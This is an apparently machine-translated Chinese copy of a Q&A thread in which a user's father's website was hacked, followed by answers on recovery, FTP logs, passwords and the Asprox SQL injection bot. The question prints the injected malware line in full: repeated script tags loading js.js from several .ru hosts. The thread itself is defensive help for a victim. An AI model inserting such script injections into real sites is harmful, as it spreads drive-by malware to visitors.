首页 / 知识

关于安全：我的网站被黑了。我该怎么办？

2023-04-11 17:19:00

My website got hacked.. What should I do?

我父亲今天打电话给我，说访问他的网站的人正在尝试将 168 种病毒下载到他们的计算机上。他根本不是技术人员，而是用所见即所得的编辑器构建了整个东西。

我打开他的网站并查看了源代码，在源代码底部的 HTML 结束标记之前有一行 Javascript 包含。他们包括这个文件(在许多其他文件中)：http://www.98hs.ru/js.js -- 在你去那个 URL 之前关闭 JAVASCRIPT。

所以我现在把它注释掉了。事实证明，他的 FTP 密码是一个普通的字典单词，长度为六个字母，所以我们认为这就是它被黑客入侵的原因。我们已将他的密码更改为 8 位数的非单词字符串(他不会输入密码，因为他是个打猎打字员)。

我在 98hs.ru 上进行了 whois，发现它是从智利的服务器托管的。实际上也有一个与之相关的电子邮件地址，但我严重怀疑这个人是罪魁祸首。可能只是其他一些被黑客入侵的网站...

我现在不知道该怎么做，因为我以前从未处理过这种事情。有人有什么建议吗？

他正在通过 webhost4life.com 使用普通的 jane 不安全 ftp。我什至看不到在他们的网站上进行 sftp 的方法。我在想他的用户名和密码被截获了？

那么，为了使这与社区更加相关，您应该采取哪些步骤/应该遵循哪些最佳做法来保护您的网站免遭黑客攻击？

为了记录，这是"神奇地"添加到他的文件中的代码行(并且不在他计算机上的文件中——我将其注释掉只是为了绝对确保它不会'不要在这个页面上做任何事情，虽然我确信 Jeff 会提防这个)：

!--script src=http://www.98hs.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.98hs.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.porv.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/scriptscript src=http://www.uhwc.ru/js.js/script--

尽可能多地收集信息。看看主机是否可以给你一个日志，显示对你的帐户进行的所有 FTP 连接。您可以使用它们来查看是否是用于进行更改的 FTP 连接并可能获取 IP 地址。

如果您使用的是 WordPress、Drupal 等预打包软件或其他任何您未编码的软件，则上传代码中可能存在允许此类修改的漏洞。如果是定制的，请仔细检查您允许用户上传文件或修改现有文件的任何地方。

第二件事是按原样转储网站并检查所有内容是否有其他修改。这可能只是他们所做的一项修改，但如果他们通过 FTP 进入，谁知道那里还有什么。

将您的网站恢复到已知的良好状态，如果需要，升级到最新版本。

您还必须考虑一定程度的回报。损害是否值得尝试追踪此人，还是您只是生活、学习和使用更强大的密码？

我知道这在游戏中有点晚了，但是提到的 JavaScript 的 URL 在已知是 6 月开始的 ASPRox 机器人复兴的一部分的网站列表中提到(至少那时我们是被它标记)。下面提到了一些关于它的细节：

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

令人讨厌的是，实际上数据库中的每个 varchar 类型字段都被"感染"以吐出对该 URL 的引用，在该 URL 中，浏览器会获得一个微小的 iframe，将其变成机器人。可以在这里找到一个基本的 SQL 修复：

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

但可怕的是，病毒会在系统表中查找要感染的值，并且许多共享托管计划还为其客户共享数据库空间。所以很可能甚至不是你父亲的网站被感染，而是他托管集群中的其他人的网站编写了一些糟糕的代码并打开了 SQL 注入攻击的大门。

如果他还没有这样做，我会向他们的主机发送一封紧急电子邮件，并给他们一个指向该 SQL 代码的链接以修复整个系统。您可以修复自己受影响的数据库表，但很可能正在进行感染的机器人将再次穿过该漏洞并感染整个数据库。

希望这可以为您提供更多信息。

编辑：再想一想，如果他正在使用其中一个主机在线设计工具来构建他的网站，那么所有这些内容可能都放在一个列中并以这种方式被感染。

你提到你爸爸正在使用网站发布工具。

如果发布工具从他的电脑发布到服务器，可能是他的本地文件是干净的，他只需要重新发布到服务器。

他应该看看他的服务器是否有与普通 FTP 不同的登录方法，不过……这不是很安全，因为它通过 Internet 以明文形式发送他的密码。

使用六字字符的密码，他可能是被暴力破解的。这比他的 ftp 被拦截的可能性更大，但也可能是这样。

从一个更强的密码开始。 (8 个字符仍然相当弱)

看看这个指向互联网安全博客的链接是否有用。

网站只是普通的静态 HTML 吗？即他没有设法为自己编写一个上传页面，允许任何人开车经过上传受感染的脚本/页面？

为什么不询问 webhost4life 是否有可用的 FTP 日志并向他们报告问题。你永远不知道，他们可能很容易接受并为你找出到底发生了什么？

我为共享主机工作，我们始终欢迎此类报告，并且通常可以根据攻击确定确切的向量并建议客户出错的地方。

这发生在我最近托管在 ipower 上的一个客户身上。我不确定您的托管环境是否基于 Apache，但如果确保仔细检查您未创建的 .htaccess 文件，尤其是在 webroot 上方和图像目录内部，因为它们往往会在那里注入一些讨厌的东西以及(他们根据他们在推荐中来自哪里来重定向人们)。还要检查您为未编写的代码创建的任何代码。

在不关闭网络服务器的情况下拔下网络服务器，以避免关闭脚本。通过另一台计算机作为数据驱动器分析硬盘，看看您是否可以通过日志文件和那种性质的东西确定罪魁祸首。验证代码是否安全，然后从备份中恢复。

我们显然是被同一个人入侵的！或者机器人，在我们的例子中。他们在一些没有人维护的旧经典 ASP 站点的 URL 中使用 SQL 注入。我们发现了攻击 IP 并在 IIS 中阻止了它们。现在我们必须重构所有旧的 ASP。
所以，我的建议是先看一下 IIS 日志，看看问题是出在你网站的代码还是服务器配置上。

网站下载计算编辑器

首页 / 知识

关于安全：我的网站被黑了。我该怎么办？

My website got hacked.. What should I do?

最新内容

相关内容

热门文章

推荐文章

标签云

猜你喜欢